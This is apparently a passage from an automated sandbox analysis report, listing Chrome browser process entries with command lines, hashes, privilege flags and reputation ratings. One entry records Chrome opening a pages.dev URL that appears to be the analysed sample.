              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2024,i,15532678080872772783,15818285137580571688,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:3
              Start time:18:47:27
              Start date:29/08/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://dfsvgd.pages.dev/"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              No disassembly